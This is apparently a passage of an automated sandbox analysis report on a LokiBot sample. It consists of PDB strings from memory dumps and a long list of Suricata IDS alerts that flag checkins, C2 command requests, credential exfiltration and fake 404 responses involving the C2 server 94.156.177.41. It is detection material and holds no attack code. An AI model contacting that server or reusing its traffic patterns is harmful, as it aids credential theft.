Source:	Binary string: \??\C:\Windows\dll\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\IOsbBBIDAm.PDB. source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056533071.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb8 source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb!v9 source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdbSystem.Windows.Forms.dllSystem.Windows.Forms.dll source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdb1 source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: mscorlib.pdb ) source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbDDa source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdbRSDS source: WERA61F.tmp.dmp.16.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

8_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49786 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49786 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49786 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49774 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49774 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49774 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49767 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49767 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49767 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49766 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49766 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49767 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49767 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49774 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49766 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49774 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49738 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49750
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49774
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49841 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49841 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49841 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49841 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49756
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49759
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49855 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49786 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49780 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49786 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49841 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49766 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49766 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49824 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49886 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49780 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49780 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49780 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49855 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49752 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49855 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49737 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49855 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49855 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49746
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49902 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49886 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49769
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49771
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49764
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49780 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49902 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49902 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49841
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49886 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49805 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49902 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49805 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49886 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49902 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49920 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49773
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49855
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49805 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49780
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49886 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49920 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49912 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49754
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49805 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49805 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49902
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49786
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49906 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49811
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49834
